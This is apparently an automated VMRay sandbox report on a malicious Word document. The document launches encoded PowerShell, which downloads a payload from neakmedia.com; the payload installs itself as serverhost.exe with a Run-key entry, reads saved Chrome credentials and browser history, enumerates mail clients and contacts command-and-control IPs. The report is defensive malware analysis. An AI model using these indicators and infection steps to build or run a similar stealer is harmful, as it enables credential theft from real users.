VMRay Analyzer Report for Sample #19564
VMRay Analyzer 2.2.0

Analyzed Sample #19564 (Malware Artifacts)
  Sample-ID: #19564
  Job-ID: #10995
  Submission-ID: #19715
  This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system.
  0 VTI Score based on VTI Database Version 2.6

Metadata of Sample File #19564
  Path: C:\Users\BGC6u8Oy yXGxkR\Desktop\sample_file.doc (doc)
  MD5:    e3f53eb751acc7eb18645753a15a1325
  SHA1:   b98d80994ef3f6a66ce37fabcb862752673de8d5
  SHA256: 455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53
  Opened_By: Process 1 (winword.exe)

Metadata of Analysis for Job-ID #10995
  Timeout: False
  Architecture: x86 32-bit PAE
  OS: Windows 7, build 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)
  VM image: win7_32_sp1-mso2013
  Other recorded values: True, 146.967

Network
  DNS: neakmedia.com resolved to 70.39.145.109
  HTTP neakmedia.com:80 (SocketAddress 70.39.145.109 80 TCP), URI neakmedia.com/hybfPDcL/ (contacted by Process 2, powershell.exe)
  HTTP 74.208.155.175:8080 (contacted by Process 6, serverhost.exe)
  HTTP 167.114.121.80:8080 (contacted by Process 11 and Process 16, serverhost.exe)

Process tree (PID, image, parent PID, command line, working directory)
  Process 1:  PID 2500 winword.exe, parent 1560
              "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 2:  PID 2664 powershell.exe, parent 2500 (child of winword.exe)
              pOwerSheLL -e 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
              C:\Users\BGC6u8Oy yXGxkR\Desktop\  (image: c:\windows\system32\windowspowershell\v1.0\powershell.exe)
  Process 3:  PID 2768 42753.exe, parent 2664 (child of powershell.exe)
              "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 4:  PID 2788 42753.exe, parent 2768
              "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\  (deletes/moves its own image, see Files)
  Process 5:  PID 2808 serverhost.exe, parent 2788
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 6:  PID 2820 serverhost.exe, parent 2808
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\  (Modified_Properties_Of, Connected_To)
  Process 7:  PID 992 svchost.exe, parent 476
              C:\Windows\system32\svchost.exe -k LocalService
              C:\Windows\system32\
  Process 8:  PID 3036 ekgeobhbhtp7rxmh.exe, parent 2820
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 9:  PID 3052 ekgeobhbhtp7rxmh.exe, parent 3036
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\  (deletes/moves its own image, see Files)
  Process 10: PID 3076 serverhost.exe, parent 3052
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 11: PID 3096 serverhost.exe, parent 3076
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\  (Modified_Properties_Of x2, Connected_To)
  Process 12: PID 3152 serverhost.exe, parent 3096
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 13: PID 3160 serverhost.exe, parent 3096
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 14: PID 3172 serverhost.exe, parent 3096
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp"
              C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Process 15: PID 1860 serverhost.exe, parent 1536
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Windows\system32\
  Process 16: PID 1852 serverhost.exe, parent 1860
              "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
              C:\Windows\system32\  (Modified_Properties_Of, Connected_To)

Files
  Dropped payload (created by Process 2, powershell.exe):
    c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe (exe)
      MD5:    d6c8126371d37ffe3100755db6aa22ed
      SHA1:   294b381e200aa3f343989877c9ef5efdda25ca42
      SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
  Relocated copy (Moved_From Temp\42753.exe, same hashes as above; a :zone.identifier stream is also written):
    C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe (exe)
  Second-stage binary (created by Process 6, serverhost.exe):
    c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe (exe)
      MD5:    2b8584cab96d20ee851054f9fedef7f3
      SHA1:   de72320cc8fc12f2e410afa07809b620f81066dc
      SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1
    This binary is in turn Moved_To C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe (overwriting the first copy).
  Output files of the /scomma child processes (all three are empty; the hashes listed are those of a zero-length file):
    c:\programdata\c570.tmp, c:\programdata\c571.tmp, c:\programdata\c572.tmp (tmp)
      MD5:    d41d8cd98f00b204e9800998ecf8427e
      SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
      SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  Browser data read (Processes 12 to 14):
    c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat
    c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\mshist012017101220171013\index.dat
    c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
    c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017063020170701\index.dat
    c:\users\bgc6u8oy yxgxkr\appdata\roaming\mozilla\firefox\profiles\zp0p8bce.default\places.sqlite
    c:\users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\web data
    c:\users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\login data
  Referenced by every payload process: c:\email.doc (doc), c:\a\foobar.bmp (bmp)
  Console handles: conout$, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE
  Routine PowerShell runtime files opened by Process 2 under c:\windows\system32\windowspowershell\v1.0\:
    getevent.types.ps1xml, types.ps1xml, diagnostics.format.ps1xml, wsman.format.ps1xml, certificate.format.ps1xml,
    dotnettypes.format.ps1xml, filesystem.format.ps1xml, help.format.ps1xml, powershellcore.format.ps1xml,
    powershelltrace.format.ps1xml, registry.format.ps1xml
    plus c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config

Mutexes
  Global\.net clr networking (powershell.exe)
  MACA73F0A
  Global\I78B95E2E
  Global\M78B95E2E
  MA991ED3B
  MB66D4A35

Registry
  Persistence (written by serverhost.exe, Processes 6, 11 and 16):
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      serverhost = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" (REG_SZ)
  Mail and browser client enumeration (Processes 12 to 14):
    HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
    HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
    HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird
    HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook (values DLLPathEx, MSIApplicationLCID)
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla
    HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin
    HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin (value PathToExe)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe
  Routine keys read by powershell.exe (Process 2):
    HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell, \1, \1\PowerShellEngine (ApplicationBase)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds (PipelineMaxStackSizeMB), \ShellIds\Microsoft.PowerShell (path)
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment (PSMODULEPATH)
    HKEY_CURRENT_USER\Environment (PSMODULEPATH)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN (StackVersion)
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog and its subkeys Application, HardwareEvents,
      Internet Explorer, Key Management Service, Media Center, OAlerts, Security, System, Windows PowerShell
      (each with a \PowerShell source subkey where present)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion (InstallationType)
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
      (Library, IsMultiInstance, First Counter, CategoryOptions, FileMappingSize, Counter Names)
    HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

VTI rule matches (category, score, rule, observation)
  Process             4/5  vmray_document_create_process         Create process "pOwerSheLL -e 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".
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "Global\.net clr networking".
  Network             3/5  vmray_request_dns_by_name             Resolve host name "neakmedia.com".
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe".
  Anti Analysis       4/5  vmray_detect_debugger_by_api          Check via API "IsDebuggerPresent" (try to detect debugger).
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "MACA73F0A".
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "Global\I78B95E2E".
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "Global\M78B95E2E".
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe".
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "MA991ED3B".
  Persistence         3/5  vmray_install_startup_script_by_registry  Add "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" to Windows startup via registry.
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe".
  Process             1/5  vmray_install_ipc_endpoint            Create mutex with name "MB66D4A35".
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp".
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp".
  Process             4/5  vmray_document_create_process         Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp".
  Browser             3/5  vmray_read_browser_history            Read the browsing history for "Microsoft Internet Explorer".
  Browser             3/5  vmray_read_browser_credentials        Read saved credentials for "Google Chrome".
  Information Stealing 4/5 vmray_readout_browser_credentials     Possibly trying to read out browser credentials.